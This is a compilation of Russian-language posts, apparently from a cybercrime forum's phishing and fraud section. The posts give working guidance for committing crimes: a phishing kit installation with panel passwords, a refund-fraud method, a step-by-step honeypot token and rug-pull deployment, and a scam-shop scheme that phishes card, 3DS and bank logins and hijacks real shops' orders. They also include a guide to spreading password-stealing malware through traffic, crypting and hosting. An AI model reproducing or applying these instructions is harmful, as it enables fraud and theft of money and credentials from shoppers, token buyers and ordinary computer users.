За то что я новичек, думаю нету смысла говорить.Сидел на форуме, иногда читал, наблюдал, но сейчас заинтересовался СИ и как это вообще устроено.

Зарание спасибо за оветы<3

Хочу предложить помощь форумчанам и новым пользователям кто решил окунуться в фиш.
В рамках оного окажу начинающим консультации по фишингу и добыче сс (2д и 3д) От А до Л. Проведу ликбез по теме, отвечу на все вопросы. А именно:

- постановка задачи
- поиск оффера
- создание связки
- технические аспекты
- нюансы хорошего фишинг проекта(сайта)
- поиск и добыча стабильного трафика

ВНИМАНИЕ!
**Ничего не продаю, не покупаю, не советую мутных левых селлеров
Не даю информации по вбиву и прочей отработке полученного материала

Прошу уважаемую администрацию не считать это коммерческим топиком.**

Уже около 2х месяцев пытаюсь найти добротную информацию связанную с индустрией кардинга, большинство говорят что все мертвое, не надо лезть и тд, но я очень сильно горю этим, считаю, что это ступень для моего будущего, поможет, так скажем, подзаработать денег и двигатся в сфере крипты или IT. Опытные люди, которые читают форум, подскажите стоит ли и хватит ли мне 250-400$, чтобы начать зарабатывать? У меня уже был небольшой опыт, но как оказалось покупал плохой материал и прокси. Буду благодарен за ценную информацию. Обучение покупать не собираюсь, считаю что это шлак и вся информация есть в интернете. ПРИВЕТ WWH!

Нейролингвистическое программирование - это труъ.
В тему СИ, готов ответить на любые вопросы в рамках этой темы :diablo:

В то же время, ищу тут увлекающихся этим направлением людей

Установка:

1. Указать данные от базы в файл dblog.php
2. Импортировать data.sql в вашу базу

Админ панель по пути site.com/admin
Пароль от админки: xss
Панель спамеров по пути site.com/lightadmin/
встроенный аккаунт спамера: sppaam:1

Spoiler: скрины

Spoiler: Главная страница

Spoiler: Админ панель(главная)

Spoiler: Панель спамера

Hidden content for authorized users.

:СКАЧАТЬ:
xss.is

Правила раздела "СИ/Фишинг/Мошенничество"

Данный раздел создан в первую очередь для конструктивного, нагруженного смыслом обсуждения вопросов связанных с такими темами как "Социальная Инженерия ", "Фишинг " и "Мошенничество ", к которому относятся и все обсуждения связанные с "Кардингом " и его ответвлениями.

Поддерживается и всячески приветствуется обсуждения и осмысленные посты с законченной мыслью на такие темы, как:

• Приёмы, методы и технологии применения социальной инженерии в контексте обсуждений форума
• Применения различных типов и видов атак - "Квид про кво", "Претекстинг", различные способы доставки полезной нагрузки до цели
• Способы маскировки ссылок, возможные варианты обходы фильтров ПС и разработчиков ПО
• Методы/техники создания фишинговых страниц/писем
• Приёмы, ПО, уловки касающиеся поиска, сбора и анализа информации полученной из общедоступных источников
• Способы/методы/направления использования различной чувствительной информации, включая платежную
• Методы и техники обналичивания денежных средств
• Авторские статьи по данным темам обсуждения
• Приличного качества копирайт статей/новостей по теме

В это разделе НЕЛЬЗЯ размешать коммерческие темы, для них есть специальный раздел.
При возникновении вопросов - Вы всегда может обратиться ко мне в личные сообщения

В этом разделе строго запрещаться :

• Флуд
• Оскорбления других участников форума
• Оффтоп в любом виде
• Создание тем без предварительного поиска похожих в раздел - нет необходимости плодить однообразные темы.
• Для того что бы выразить своё одобрение или неудовлетворенность постом есть кнопка реакции - лайк и дизлайк, делать это отдельным сообщением запрещено.
• Постить несколько сообщений друг за другом
• Чрезмерно цитировать сообщения других участников
• Мат в любом виде
• Запрет на попрошайничество во всех видах - 2 рецидива = БАН
• Запрет на создание тем с названием привлекающим внимание, выполненных полностью в капсе - такие темы будут удаляться.
• Запрет на чрезмерные апы тем.
• Обсуждение работы по СНГ

Также все участник должны выполнять общие правила форума.
Правила будут меняться и дополнятся по мере необходимости.

Отпишите какие есть варинаты! Как легальные, так и полулегальные.
При этом обладая лишь повехностынми знаниями и без особых усилий.
Если имееться комп, и безлимитный инет (с невыскокй скоростью)
Правда в инете я провожу часов по 12-15 в сутки (если не больше)

Парни, всем привет. В данной статье я разберу тему рефов. Постараюсь без воды, максимально по полкам.

Обучение рефам это на самом деле, глупая идея). Я действительно хуею, насколько эта ниша получила авторитет. Ну я имею ввиду, что фактически, это очень простая х#йня, которую может провернуть абсолютно каждый, без обучений. Но инфобизнес работает на все сто. ниша процветает, вкидывают обучи по 400 баксов, делают рефы за процент.

Рефы - это исключительно творческая ниша. А обучение творчеству, это довольно странно)

Click to expand...

Начнём по порядку:

Что надо делать?​

Пиздеть что посылка которая тебе пришла, в хуёвом состоянии и просить обратно свои бабки.

Почему это перспективнее все чёрных тем?​

1. Потому что это серый заработок. И привлечь к ответственности почти невозможно. А если что-то и сделают, то просто штрафанут на норм бабки. И то, это нужно постараться. Забить на анонимность полностью и делать ебейшие паки товарки на свой адрес (ебейшие это каждый месяц товарки на 100к+). Если вы не совсем еблан, то используете левые карты, номера и знаете как правильно доставлять на свой адрес товары. За адрес я позже расскажу.
2. Эта тема бессмерта. СС, BA, PayPal, казино, ставки, вилки - это всё темы, в которых люди крутяться как ебан#й уж. каждый месяц какой-то пиздец. постоянный онлайн, постоянно в теме. появилась кнопка бабло, через неделю сдохла, фрод стал жестче. Аккаунты БК банят и прочая дрочь, которая как-бы будет жить вечно, но вы не сможете хотя бы на месяц отдохнуть. Введу какого-то пиздеца. В рефах всё проще. Я когда начинал, я делал по фану, у меня не было единомышленников в интернете. Я просто активно сидел в чатах, смотрел что как рефают ребята. Но я не зависел в постоянной информации. Потому что пару инструментов могут приносить без еботни нормальные деньги (при хорошем капитале).

К сути ​

В рефах мне нравиться то, что там есть необходимость обладать нестандартным, хитрожопых мышлением. Фактически, в карже так же. Но чтобы дойти до уровня того, что это мышление приносило бабки, ты должен изучить работу фрода, знать нужные бины, конторы, пробив сервисы, связи и т.д.

В рефах всё как в филосифии). Мыслить может каждый, и сказать какую-то умную х#йню тоже. Просто у кого-то это получается лучше, а у кого-то хуже.

К чему это? Да к тому, что здесь хватит просто логики.

Как выбрать товар под реф? И хуле еще надо учиться подбирать?​

Здравая логика. Чтобы наебать магазин, желательно чтобы тебе верили больше чем продавцу. А чтобы тебе верили больше чем продавцу, тебе необходимо:

1. Предоставить внушительные причины вернуть бабки
2. Чтобы к тебе относились лояльно
3. Чтобы к продавцу относились менее лояльно

Разбор №1

Предоставить внушительные причины вернуть бабки

Click to expand...

Как предоставить внушительные причины? Ну если голова на плечах есть, можешь сам уже понять. Но другой вопрос, что для интернет магазина внушительная причина? Для меня, внушительная причина вернуть бабки, это если твоя купленная бандура вообще не работает. А для интернет магазина одной царапины хватит чтобы вернули деньги. Т.е. нужен опыт в разных интернет площадках. Чтобы понимать, кто трясется за свою репутацию. Это немного длинная история, расскажу позже.

Разбор №2

Чтобы к тебе относились лояльно

Click to expand...

Для того что показать им, что ты не наёбщик, который сделал заказ ради возвращения денег, ты должен внушить доверие к себе ̶~~п̶р̶я̶м̶ ̶к̶а̶к̶ ̶т̶ё̶л̶к̶и̶ ̶д̶е̶л̶а̶ю̶т̶.~~

Что для это нужно? Очень просто, сделать ещё несколько заказов, в которых ты не будешь открывать споры. А как посылки придут, просто пиши пиздатые отзывы. Ну заказал 2 посылки по 2 бакса, приложил фоточки к отзыву, сказал как всё охуенно и еще подписал что их интернет магазин охуенный.

Всегда примеряй себя на место интернет-магазина.

Если приходит х#й который создал акк месяц назад и просит бабки назад, ты бы точно ему поверил?

А если этот х#й создал аккаунт 3 месяца назад, делал несколько заказов, оставлял положительные отзывы, и ещё добавлял какой у них пиздатый магаз, ты бы проявил к нему больше лояльности во время спора? Ответ очевиден.

Разбор №3

Чтобы к продавцу относились менее лояльно

Click to expand...

Сразу скажу, что я буду обучать рефать товары с интернет-площадок. Забудьте нахуй про интернет магазины, которые продают товары сами. Действуй логично. Если ты юзаешь интернет площадку, то она всего лишь посред, между тобой и продавцом. Она свои деньги не теряет. Ей глубоко похуй на то, что продаван потеряет деньги. Для неё куда важнее покупатели.Но опять же, не всегда. Мы именно поэтому смотрим продавца с хуёвым рейтингом. Потому что если продавец красава, давно на рынке, положительные отзывы, а ты такой х#й с горы, который создал акк месяц назад и требует деньги, то шанс выиграть спор в разы ниже. А интернет магазин, который продает все товары от себя, трясется за свои бабки. И если ты пойдешь рефать х#йню за 300 баксов, они эти деньги теряют, и судят спор тоже они. Поэтому пока мы не будем разбирать магазы индивидуалки. Опять же, нельзя говорить за всех. Есть несколько отличных брендовых магазинов, которые спокойно возвращают бабки.

Выбираем продавца​

Условно, нам нужен телефон. Первым делом смотрим рейтинг продавца. Зачем смотреть рейтинг? Я писал выше! Желательно чтобы рейтинг был 4 звезды и ниже. Но куда важнее, чтобы магазин был новый. Есть большая разница между магазином с 4 звездами, 3 годами продаж и сотней отзывов. И магазином с 5 звездами, 6 месяцами работы и одним десятком отзывов.

Если у нас есть магазин, в котором рейтинг 4.5, дохуя отзывов и много лет работы, мы не лезем рефать их товарку, т.к. очень много рисков.
Если у нас магазин которому не больше года, нету отзывов, или очень мало, то впринципе он нам подходит.

​

Смотрим описание​

Успешный реф - это всё в совокупности. Не охуенные знания СИ, не пиздато прогретый аккаунт под реф, а всё по чуть-чуть.

Click to expand...

Именно поэтому плохой магазин не залог успеха. Мы должны бить по всем форонтам. Мы не просто ищем плохой шоп, а еще в совокупности к этому, товар с плохим описанием, неточностями, какими-то ляпами.

Но описание товаров, хитрости продавцов, оптовые закупки под реф и многое другое, мы рассмотрим в следующей статье. Из этой статьи вы должны запомни главное:

1. Реф - это творчество
2. Заставь их проявлять к тебе лояльность
3. Ищи продавана мамонта
4. Ты будешь спокойно спать по ночам, ехехе

В этой статье я вам дам полный мануал как сделать скам токен с невозможностью продажи, но возможностью покупки токена и неофициальным листингом на Pancakeswap.Каждый из вас сможет запустить свой скам токен,взамен я прошу поддержать эту статью.Тут не будет воды, а сразу действие. Ну что? Поехали!

Для того, что бы начать, нам понадобиться:​

• Metamask расширение для браузера - Гайд по установке
• Добавить сеть Binance Smart Chain в Metamask - Гайд
• BNB на кошельке Metamask - Как купить BNB
• Смарт-контракт скам токена - Ссылка

• Шаг 1: Создайте файл для вашего контракта​

Перейдите на сайт https://remix.ethereum.org/ и создайте новый файл "ВашеНазвание**.SOL** "

• 

• Шаг 2: Добавляем код​

Скопируйте и вставьте код контракта в открывшееся рабочее пространство

Смарт-контракт скам токена -Ссылка

Шаг 3: Компилятор​

Переходим в 3ю вкладку

Версия контракта и версия компилятора должны совпадать!

Compiler : 0.6.6

Click to expand...

Нажимаем на голубую кнопку Compile "ИмяВашегоФайла.sol"

Если в контракте нет ошибок, то на значке компилятора появится зеленая галочка, как на скриншоте

Click to expand...

Шаг 3: Компилятор​

Переходим в 3ю вкладку

Версия контракта и версия компилятора должны совпадать!

Compiler : 0.6.6

Click to expand...

Нажимаем на голубую кнопку Compile "ИмяВашегоФайла.sol"

Если в контракте нет ошибок, то на значке компилятора появится зеленая галочка, как на скриншоте

Click to expand...

Шаг 4: Запускаем токен​

Переходим в 4ю вкладку

Environment: Выбираем "Injected Web3 "

Click to expand...

Account: Ваш адрес кошелька Metamask. В кошельке переключитесь на сеть Binance Smart Chain

Click to expand...

Contract : Выбираем TokenContract - ИмяВашегоФайла.sol

Click to expand...

На против кнопки Deploy нажмите на стрелку, что бы открыть меню токена

Заполните информацию токена

NAME = Имя вашего токена

Click to expand...

SYMBOL = Символ вашего токена

Click to expand...

TOTALSUPPLY = Общее количество токенов

Click to expand...

Архитектура контракта написана таким образом, что ликвидность добавляется автоматически сразу после создания токена

LIQUIDITY = Количество скам-токенов, которое отправиться в пул ликвидности. Количество не должно превышать TOTALSUPPLY

Click to expand...

VALUE = Количество BNB, которое отправится в пул ликвидности. Минимум можно добавить 0.5 BNB, в противном случае токен не сможет функционировать.

Click to expand...

В раскрывающемся окне, в место Wei выберите Finney

Click to expand...

Укажите минимум 500 Finney. 1000 Finney = 1 BNB.

Click to expand...

Нажмите кнопку **Transact

Подпишите транзакцию

Адрес смарт контракта lp-токена = адрес пула ликвидности.**

Важно: Создавая новый пул ликвидности и внося туда свои скам токены - вы являетесь единственным владельцем всех средств, которые поступят в этот пул после обменов.

Click to expand...

Готово. Токен создан! ​

**На ваш кошелёк зачислят все токены, за вычетом количества,

отправленного в ликвидность.** ​

**Контракт автоматически добавит пару ликвидности в PancakeSwap и

отправит вам LP токены (что с ними делать расскажу ниже)** ​

Токен будет доступен для покупки на Pancakeswap сразу после создания! ​

---

**Адрес контракта для импорта токенов в Metamask или Pancakeswap появится

под кнопкой Deploy в разделе Deployed Contracts.** ​

Нажмите на иконку "Скопировать", что бы получить полный адрес контракта

Как работает Honeypot ​

Для примера покупаем 1 токен

Апрувим контракт прежде чем свапнуть, если это требуется

Click to expand...

Пробуем продать ​

Видим ошибку. Токен невозможно продать

RugPull time​

Что бы вытянуть всю ликвидность обратно у вас должны быть LP токены вашего пула ликвидности. PancakeSwap автоматически отправит их на ваш кошелёк, после создания токена.

**Что такое LP токены?

LP токены -** репрезентация доли средств в пуле ликвидности.

Адрес смарт контракта lp-токена = адрес пула ликвидности.

Важно: Создавая новый пул ликвидности и внося туда свои скам токены - вы являетесь единственным владельцем всех средств, которые поступят в этот пул после обменов.

Click to expand...

Выводим ликвидность​

Под кнопкой Deploy в разделе, где вы указывали информацию о токене, снизу можно увидеть ваш контракт. Нажмите на стрелку и разверните меню создателя

В поле ввода укажите, какой процент от пула вы хотите вывести себе на кошелёк. Нажмите на кнопку RemoveLiquidity и **подпишите транзакцию

Средства моментально окажутся у вас на кошельке**

---

Всё готово​

Самое время нагнать трафик и лутать профит​

С вами были Crypto Forbes Russia

Привет девочки и мальчики а также их родители. Решил выгрузить небольшую часть опыта по разводкам в интернетах. ​

и так, я не писака и не умею формулировать мысли. но думаю кому надо тот поймет)

#1 Скамшоп

Идем на google.com/maps и выбираем страну

[рекомендация от меня]
Хуевые страны и их минуса:
Сложно вбивать на постоянном объеме: ЮСА, АЗИЯ, КАНАДА
Маленький средний чек: Африка, восточная Европа

Как выбрали страну идем на маркетплейсы и смотрим че вообще людям надо и на что дефицит.

[рекомендация от меня]
Хуевые товары это техника apple, мебель и разная мелочевка для дома

Дальше ищем сайт(ы) донор от куда вам раб будет брать товарку или дизайн. Идем на google.com включаем проксю той страны которую выбрали. Поиск по ключам Купить секс-игрушку и т.д

Выбрал ты сайт(ы) дальше покупаем домен на любом антиабузе например: https://nicenic.net/ сервак или хост можно поискать тут на форуме

По своему опыту рекомендую использовать платформу ОpenСart для поднятия шопа. Выбираем шаблон например https://opencartforum.com/files/

Свое время нужно ценить, нечего боярам заниматься работой для челяди по этому используем фрилансбиржи для старта сайта. например https://kwork.ru/categories/website-development/noviy- sayt

Выдаем бедолагам доступы к серверу, высылаем купленный шаблон ,и дальше свои пожелания по дизайну и товарке с сайтов доноров. Процесс изготовления займет 1-2 недели, смотря какая загруженность и мотивация бедолаги. ​

вопрос ответ
Можно создать сайт 1в1 типа фейк м-видео? да, но красная табличка от гугла будет прилетать и таким вариантом разводок не советую использовать. Вы получите лишние вопросы, и куча мозгоебства на всех процессах.

Сколько бумаг я потрачу на данном этапе? домен 20$ хост/сервак 20-50$ красивый шаблон 20-60$ разработка сайта 70-150$ и доп траты до 30-50$​

Как только бедолага сдал Вам работу по простому и ясному тз вы начинаете смотреть че исправить, сайт не должен быть сильно сложным. Хватит таких разделов: Каталог Товаров О Компании Доставка/оплата Контакты Гарантия. Цены ставим по рынку но вешаем скидку. В зависимости от товарки. Это сложная тема со скидками, нужно ходить на краю Дать почувствовать халяву, но не вызвать подозрения. Если Вы запустились и видите что Вам написали что вы мошенник и цены маленькие то не стоит переживать, возможно дело не в ценах а лохе который не является вашим клиентом.

Сделайте максимально быстрое оформление заказа. номер телефона, почта, адрес, имя. и то почту не обезательно ставить, так-как есть страны где разные банки и организации так запугали людей что боятся оставить где либо почту.

Доставку ставьте самую популярную по том гео где делаете шоп 2 варианта и сделайте поле самовывоз с магазина, только условие надо написать в доставку что-бы оформить самовывоз ты должен оформить заказ на сайте)

Такс- по оплате тут тоже все зависит от гео, лучше всего повесить 2 -3 варианта карта, банк трансфер и чтото локальное в их регионе. Так-же при выборе банк трасфер можно сделать чтобы редирект на страницу авторизации в лк банка, и вы будите стилить БА.

что надо еще? Заказываем на фрилансбирже красивое письмо с заказом"ваш заказ оформлен" и вешаем на сайт чат тех поддержи, это все вкусовщина например jivo.ru или smartsupp.com . И регистрируем пачку менеджеров под вашу страну.

Как выглядит процесс заказа? лох оформил заказ - его перекинуло на оплату - вы кинули ему сообщение/письмо что ваш заказ оформлен ожидает оплату и ссылку на оплату - если не оплатил то идем в месенджер дожимаем.

Вот и все ваш шоп готов, но вот беда не понимаешь ты как трафик брать. тут все просто, гугл фб и тизерки если товарка ваша позволяет, например вы сделали секс-шоп и ходите продавать дилдаки идете на трафик-джанки это тизерка хаба. Я это написал что-бы вы понимали кто ваш человек и где он сидит.

Вы должны научится лить трафик сами! не пытайтесь найти форумчанина который нальет, 99% которые будут это воздух. Лучше всего лить со своих, без каржа, Так-как менее мозгоебнее и трата/профит +1000% при правильном подходе. Чистый айпи, нету клауда и прочей чепухи по типу антиддоса и ваш сайт вылазит в топ по запросам, далее начинаете получать бесплатный трафик который ничего не стоит)))

но это все паблик методы, вот начинается самое интересное.
на таких методах как указано выше есть крыша по чистому профиту, обычно это до 10к баксов в день и 200 в месяц , готовьтесь что сайт будут ддосить, и прочее траблы когда будет простой.

#2 Разводка И так, Идем мы на разные форумы и скупаем у барыг или делаем топик, КУПЛЮ ДОСТУПЫ К ШОПАМ, вы купили доступ и видите там базу заказов, по этой базе проспамили разводку чтото по типу "Майкал ты тут регестрировался на нашем сайте но не забрал свой бонус" этот вариант письма подойдет если вы оформили индивидуальный скамшоп НО. Вы можете перехватывать заказы, схема выглдит так, у вас есть доступ к шопу где 30 ордеров в сутки, вы начинаете кидать свои ссылки на оплату, получается вы заказываете платежку по дизайну 1в1 как в шопе и начинаете делать перехватывать заказы, по своему последнему опыту могу сказать такую стату: ​

100 заказов
средний чек 1.5к евро
35 оплат на сайте шопа на офф линке
27 оплат на моем линке
шоп выпалил что у меня был доступ только через 62 часа после первого моего письма и смс мамонту.

НО! нас выкинули у нас осталась база старых заказов, мы берем эту базу и смотрим что оформлял покупатель, и сумму имя и контакты, делаем письмо такого плана от имени шопа будем слать"Майкал ты у нас покупал мясорубку, но ты не забрал кешбек в виде реальных евро на свою карту" и даже пофиг что майкал платил с палки, не имеет значения. Майкал смотрит на это письмо и думает, офигеть я за мясорубку отдал 400 евро а тут кешбек 70, европейцы очень экономные и любят такое.

С базы 1к заказов за последний месяц работы шопа, можно достать колоссальные суммы. Но есть свои минуса, это нужно поднять свою жопу с дивана и научится спамить и быстро реагировать. Так-же проблема это списывать бабос. Хорошего вбивера или мерч найти допольно сложно, по этому я решил поделится самые простые варианты куда девать бабло мамонта(ссылочки будут внизу)

Для этой схемы со спамом по базе шопа нам надо: письмо, простая информативная страница, страница вбива карты как на фото и страница 3дс супер простая 1 под все банки. или сделать на выбор получить кешбек карта/БА​

Это все можно заказать на фрилансе, cтраницу вбива чистую вам напишут за пару сотен. Страницу вбива лучше всего вешать на отдельный домен, что-бы когда гугл дал красную табличку вы не потеряли лохов которые не успели забрать свой кешбек с письма.
Вбиваем сразу на любую сумму, обычно на опыте уже будите понимать на каких картах бабки есть, а на которых пусто или под привязку на пос/сервисы куда можно всунуть applepay
​

Думаю на этом все, а то чет заебался писать, оформлять красиво не буду причина написана в начале предложения.

КТО ПОСТАВИТ ЛАЙК ТОМУ ПОМОГУ ЧЕМ СМОГУ!

Code:Copy to clipboard

Домены: nicenic.net
Разное для шопа: opencartforum.com/files
Хост/cервер: xss.is/forums/134/
Сюда вбиваем: aliexpress.com есть applepay
Сюда вбиваем: alibaba.com есть applepay
Cюда вбиваем: computeruniverse.net есть applepay
Сюда вбиваем сразу крипта но много нюаносов!!: kraken.com есть applepay
Сборник шопов по РУ(можно насытится идеей scam.su

В любой ситуации по покупке доступов и баз используйте гаранта, и сразу оговаривайте все условия. Что за доступ, как реализована оплата на сайте, что в базе есть и т.д

Шоп лучше заказывать у работяги с фриланса, шанс что работа будет выполнена качественно и в сроки на много выше чем "мастер на все руки" с форумов.

​

Пишется для новичков! Тема длинная и обширная, поэтому придется разбивать её на несколько частей. Если заинтересует, продолжу.

Хочу сразу сказать, что всё описанное ниже основано сугубо на личном и практическом опыте. Ссылок на сервисы не даю, обосрать кого-то цели тоже нет. Надеюсь, что данная информация пригодится хотя бы 1 целевому человеку из 10. Другие слишком глупые и ленивые, чтобы извлечь из этого какой-то толк.

Вообще написать этот пост меня побудила ситуация, которая происходит на рынке, в общем и целом. А на рынке процент банального наёба покупателей уже давно зашкаливает за все возможные границы. Более того, если раньше это как-то скрывали, то сейчас даже не скрывают. Происходит это, конечно, ввиду абсолютной тупости «населения» тематических форумов.

Поэтому мы с вами и разберем каждый шаг, чтобы потом вы просто тупо посылали селлеров, которые будут лить вам в уши говно и гнать пургу. Знание – сила!

Статистика упорно показывает, что самые (и единственно!) успешные люди в любой сфере – это те, кто самые умные, работоспособные и обладают секретной информацией. Остальные (около 95%) - это обычная кормовая база, для разного рода коммерческих сервисов. В нашем случае это люди, которые единственное, что умеют это втупую тыкать на клавиши, ныть, жаловаться и гадить везде, где можно и нельзя.

Если есть желание разобраться в вопросе и добиться финансово успеха, то советую прислушаться к моим советам.

Параграф ноль. Нулевая точка отсчета. Начнём с подготовки.

Прежде всего, вам понадобится:

• Понимание основ мат. части
• Понимание, что придется пройти путь, в котором будут неудачи. ОНИ БУДУТ. Исключений нет. И сложности всегда будут. Не существует вечных рабочих тем.
• Трудолюбие и упорство.

Первое. Мат часть.

Это то, что уважаемое школие, студенты и взрослый люд ненавидят больше всего. Теория. Казалось бы, на кой черт нужна теория? «Я голый практик, фтопку теорию» с гордостью заявляют 9 из 10 человек.

Теоретическая база нужна везде. Вообще везде. От и до разбираться не нужно, но основы знать обязательно. Как минимум это относится к:

~ Минимальное понимание основ администрирования серверов
~ Понимание основных протоколов работы
~ Базовые знания html|css если работаете с лендингами.
~ Понимание основ криптографии.
~ Умение спуферить данные которые приходят/уходят в вашей работе.

Зачем это нужно? Иначе вы будете брести в полной тьме, даже не понимая, что делаете от слова совсем и вообще. Успех работы зависит для начала ОТ ПОНИМАНИЯ ДЕЙСТВИЙ, КОТОРЫЕ ВЫ ВЫПОЛНЯЕТЕ. И второе КАК ИМЕННО ЭТО ДЕЙСТВИЕ ФУНКЦИОНИРУЕТ.

О каком финансовом успехе тогда вообще может идти речь?

Второе. Сложности.

Условно представим, что путь от начала сборки вашего денежного конвеера состоит из 10 шагов. И каждый шаг имеет 3-4 подшага. Итого, есть 40 ячеек, которые должны выстрелить с шансом «успех».

Если вы не верите в Высшую Магию, но тогда понимаете, что где-то да будут проблемы. Болеее того, скорее всего они будут на каждом шаге. К этой прозе жизни надо привыкать.

Но я вам скажу так, это абсолютно нормально. Если вы боитесь сложностей и в глубине души надеетесь, что вас пронесет от всего этого зла, то лучше даже не приступайте. Любая сложность решаемая. Вообще любая, просто надо уметь искать подход. Когда научитесь – успех не заставит себя ждать.

Третье. Трудолюбие и упорство.

Тут всё просто. Если не готовы пахать в первое время по 12 часов в день и больше, успеха вам не видать. Вам просто не хватит времени всё настроить и запустить. Всё меняется, всё в движении. Данная тема не для любителей спокойных, ламинарных течений. Можете поспорить, конечно, но доказывать что-то надо себе, а не другим людям.

Параграф первый. Наглядная схема работы.

Казалось бы, занудная и бесполезная тема, одна судя по моему личному общению как минимум половина не представляет всей картины, в общем и целом! Так что поразмышляем наглядно. Итак. Представим это в виде простейшей математической формулы:

Трафик + софт = материал для работы = прибыль

Коротко говоря, мы имеем трафик, который в конечном итоге приводит к тому, что у вас будут установки вашего exe файла на компах пользователей (Install’ы). С компа пользователя вы можете получить полезный материал, который превращаете в деньги.

Теперь расширим функцию:

• Трафик состоит из собственно трафика и метода превращения трафика в инсталлы. В нашем случае это банальная скачка и установка файла с сайта. Связки ввиду их умирания рассматривать не будем.
• Софт состоит из подбора софта и его настройки.
• Материал для работы состоит из логов, доступа к ПК/телефону, перехвата данных.
• Прибыль состоит из активной и пассивной

Теперь соединим это всё воедино:

(Канал трафика + конверсионный сайт) + настроенный софт = Логи +возможный доступ к ПК/телефону + кейлоггер (по надобности) = Активный и пассивный доход.

Конверсионный сайт состоит из собственно сайта, протестированного и заточенного на максимальную конверсию и продуманную легенду/тематику. Сюда же добавим аналитику (ТДС систему). Сюда же добавим антиклоакинг. Сюда же добавим хороший крипт. Еще сюда же добавим хостинг для сайтов и возможный хостинг для вашего софта. Об этом ниже. Наша функция распухает и становится неудобоваримой визуально. А ведь это лишь база!

Итого функция приходит к виду:

(Канал трафика + (легенда + максимально конверсионный сайт + ТДС система + антиклоакинг + крипт файла)) + настроенный софт + настроенный хостинг = Логи (+возможный доступ к ПК/телефону) + кейлоггер (по надобности) = Логи +возможный доступ к ПК/телефону + кейлоггер (по надобности) = Активный и пассивный доход.

Теперь вопрос. Много ли людей вообще об этом задумывается, как много им нужно для работы? Очень мало …

Каждый! Каждый шаг требует проработки! Каждый! Причем детальной, вдумчивой и внимательной. Если один из множителей будет равен нулю, то всё ваше умножение и будет равно нулю. Жиза, однако.

Ну и теперь добью, у кого еще остались розовые очки. Никто эту схему за вас не соберет. Так что садимся за гугл и начинаем вдумчиво изучать что и как в этом мире работает и устроено.

Параграф второй. Софт для работы.

Вначале рассмотрим собственно софт для работы. Потому что, исходя из ваших возможностей (финансовых и интеллектуальных), отталкиваться нужно именно от этого.

Для новичков (и не только) – самый оптимальный вариант – это стиллер. Такая хрень, которая прёт с компа (в общем и целом) и браузеров ( в частности) всё что плохо приколочено. Пароли, явки, фото, данные, кукисы и т.д. В общем, противная вещь для злых дядей.

Опять же, каких-то либо ссылок давать не буду. Я скажу, как выбрать лучший вариант для себя, на что обратить внимание и как не наебаться с покупкой.

Итак, стиллеров на рынке много. От известных, до не очень известных. Основная зона обитания это эксплоит и ввх. Приватных еще больше. Отмечу, что в данном случае «приватный» не означает «супер-качественный». Обычно, даже наоборот. Условно все стиллеры можно разделить на две группы:

• Стиллер, который расположен на сторонних серверах.
• Стиллер, который вы располагаете у себя.

Внимание! Далее идет сугубо личное мнение. А то сейчас налетят селлеры стиллеров и закидают меня какашками.

Давайте сразу учтём одну простую мысль. Всё что пишут, будет правдой в лучшем случае наполовину. Стоит открыть форум и вы увидите сотни тем, где прямо всё так вкусно и радужно. Вот только купи, запусти и тебе польётся денежный поток. Ни проблем, ни подводных камней, ни наёбов и подъебов. Ничего нет. Одна только концентрированная радость от работы и пухнущий кошелек от биткоинов.

Наёбывают все! Абсолютно все! Избежать этого можно, лишь понимая мат часть и зная, что именно и для чего вам нужно!

• Стиллер, который расположен на сторонних серверах.

Чем хороши стиллеры, которые грубо говоря, выдаются под ключ? С одной стороны всё выглядит кошерно в стиле лакшери. За энную сумму в месяц вы получаете софт, полностью готовый для работы. Можно сказать под ключ. Криптуй и в бой! На этом плюсы заканчиваются. Рассмотрим минусы.

Прежде всего, нужно понимать, что ВСЕ ваши логи и данные будут расположены на серверах доступа к которым у вас нет. Конечно, вы прочитаете много заверений про «сервера, расположенные на Марсе/Юпитере/Луне/в недрах черной дыры» а еще «никакого логирования», а так же «кристально чистую работу с клиентами» и т.д.

Думаем логично – вы доверяете ваши деньги и безопасность стороннему сервису? Особенно в черном бизнесе. Даже так – можете ли вы доверять кому-то ваши данные тупо под честное слово? В сфере, где само слово «доверие» выглядит как- то жалко, смешно и по … заказанному что ли. Доверять можно, если можно проверить. А если проверить нельзя, то ….

Если всё-таки доверяете, то вопрос решенный. Если нет, то переходим ко второму варианту.

• Стиллер, который вы располагаете у себя.

В данном случае все ваши данные будут на вашем сервере. Минусы опять же на виду – поковыряться с настройкой придется самостоятельно. И с установкой тоже. Да и базовую тех поддержку придется оказывать самостоятельно, если не хотите терять тонну времени. В общем-то, это даже и не минус. Для кого-то наоборот жирный плюс.

А теперь КРИТИЧЕСКИ ВАЖНОЕ замечание, на которые обычно все ложат большой и толстый хер.

Стиллер надо проверить. Проверить самостоятельно! Не доверяя никому, никаким чекерам, тестерам и т.д. Берете пачку дедов/виртуалок с информацией на диске и разных браузерах (если дед голый – набейте ее самостоятельно). От ХП до 10 винды, версии х86/х64. Отключите все антивирусы и запустите билд. Проход должен быть 100% и только так! Если где-то что-то не отрабатывает, смело пишите разработчику и выясняйте этот момент. Вас будут уверять, что вы дибил и у них всё работает. Не верьте, вы не дибил. Наоборот, вы стали умнеть и стали слишком неудобным клиентом.

P.S. Вы даже не представляете насколько убого реализовано большинство стиллеров. Потери доходят до 50% !!! И я не утрирую.

Параграф третий. Хостинг.

Самая больная тема, увы и ах. А для новичка еще и самая сложная. Поэтому разбираемся внимательно. Как бы вы не стремились к автономности и минимальной зависимости от сторонних серверов, с хостерами работать вам придётся постоянно. А эти редиски этим вовсю пользуются.

Итак, при подборе сервера надо сразу понимать, что именно вам нужно. И для чего. И какие требования. Под стиллер вам нужен обычный VDS средней мощности. 2-4 ядра, 4-8 гигабайт RAM, 100 гб SSD вполне себе для работы.
Под внц требования на порядок выше и сложнее! Поэтому это я здесь описывать не буду, ибо тема не для новичков уже.

А теперь список самых распространённых наёбов со стороны хостинга:

• Херовое качество в общем и целом. Есть такой параметр как uptime. Если коротко, сколько в % отношении сей VDS находится в живом состоянии. У хорошего хостинга этот параметр около 99,5% - 99.9%

Антиреклама. Например, фастфлюкс (рассмотрим ниже) у BRAZZERS в последнее время показывает аптайм 10-20% Я не ошибся. Около 80-90% времени их фф находится в дауне! Тех поддержка проблему не признаёт и тупо игнорит или банит. Курите форумы, там всё написано.

UPTIME мерять самостоятельно! Необходимо! Обязательно!

Посчитаем: Частично не отработал стиллер, аптайм в пределах 90% (например). Вы еще даже близко не приступили к работе, а уже потеряли около 15-20% потенциальных инсталлов. Нравится картина?

• Наёб с каналом.

